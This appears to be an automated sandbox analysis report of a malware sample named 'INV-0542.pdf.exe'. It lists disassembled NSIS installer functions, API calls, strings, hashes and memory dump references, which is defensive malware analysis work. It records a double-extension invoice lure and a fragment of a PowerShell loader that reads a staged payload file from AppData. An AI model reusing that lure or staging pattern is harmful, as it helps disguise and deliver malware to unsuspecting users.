lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CE7
FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CF7
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
FindClose.KERNEL32(00000000), ref: 00405DA6

Strings

"C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00405C56
\*.*, xrefs: 00405CB8
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1788928128
Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
FindClose.KERNEL32(00000000), ref: 004068B5

Strings

X_B, xrefs: 0040689F

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: X_B
API String ID: 2295610775-941606717
Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 0040228E

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
API String ID: 542301482-747733597
Opcode ID: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
Opcode Fuzzy Hash: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54

Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
Opcode Fuzzy Hash: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
ShowWindow.USER32(?), ref: 0040401D
GetWindowLongW.USER32(?,000000F0), ref: 0040402F
ShowWindow.USER32(?,00000004), ref: 00404048
DestroyWindow.USER32 ref: 0040405C
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
GetDlgItem.USER32(?,?), ref: 00404094
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
IsWindowEnabled.USER32(00000000), ref: 004040AF
GetDlgItem.USER32(?,00000001), ref: 0040415A
GetDlgItem.USER32(?,00000002), ref: 00404164
SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
GetDlgItem.USER32(?,00000003), ref: 00404275
ShowWindow.USER32(00000000,?), ref: 00404296
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
EnableWindow.USER32(?,?), ref: 004042C3
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
EnableMenuItem.USER32(00000000), ref: 004042E0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
SetWindowTextW.USER32(?,00422F08), ref: 00404349
ShowWindow.USER32(?,0000000A), ref: 0040447D

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",00008001), ref: 00403C94
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403D14
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis), ref: 00403D7B

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

RegisterClassW.USER32(004289C0), ref: 00403DB8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
ShowWindow.USER32(00000005,00000000), ref: 00403E3B
GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
RegisterClassW.USER32(004289C0), ref: 00403E7D
DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C

Strings

"C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00403C16
1033, xrefs: 00403C33, 00403C8F
RichEd20, xrefs: 00403E41
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00403CA3, 00403CAB, 00403D4E, 00403D54, 00403D64
RichEd32, xrefs: 00403E4F
RichEdit, xrefs: 00403E6E
.DEFAULT\Control Panel\International, xrefs: 00403C7F
: Completed, xrefs: 00403CDB, 00403CE4, 00403CF2, 00403D41, 00403D47
RichEdit20W, xrefs: 00403E5F, 00403E65
.exe, xrefs: 00403D21
Control Panel\Desktop\ResourceLocale, xrefs: 00403C47
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C18
_Nb, xrefs: 00403D97, 00403DFF

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-303122720
Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251

Strings

"C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 004030A8
Error launching installer, xrefs: 004030F2
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
Null, xrefs: 00403199
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
soft, xrefs: 00403190
Inst, xrefs: 00403187
C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1806737068
Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
lstrlenW.KERNEL32(: Completed,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742
matrices, xrefs: 004065A2
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406671
: Completed, xrefs: 004065AB, 00406665, 0040666C, 00406670, 00406689, 0040668A, 0040669F, 004066B5, 004066E6, 00406712, 00406747, 0040674D, 0040676A, 0040677D, 0040679B, 004067A1, 004067AA, 004067DF
"$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk, xrefs: 00406777

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$matrices
API String ID: 4024019347-412969389
Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,?,00000031), ref: 004017D5
CompareFileTime.KERNEL32(-00000014,?,%Konstituerende176%\presatisfaction,%Konstituerende176%\presatisfaction,00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,?,00000031), ref: 004017FA

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

eksegeternes, xrefs: 0040185A, 00401876
%Konstituerende176%\presatisfaction, xrefs: 004017B2, 004017BB, 004017DA, 004017E6, 0040181C, 00401832, 00401850, 0040188C, 0040190D, 00401916, 00401920, 0040192B
lftninger\slangetmmerens, xrefs: 00401846, 00401864
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 004017C3

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: %Konstituerende176%\presatisfaction$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$eksegeternes$lftninger\slangetmmerens
API String ID: 1941528284-4243214563
Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
SetWindowTextW.USER32(matrices,matrices), ref: 00405633
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

matrices, xrefs: 004055E7, 004055F7, 004055FD, 00405620, 0040562C

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
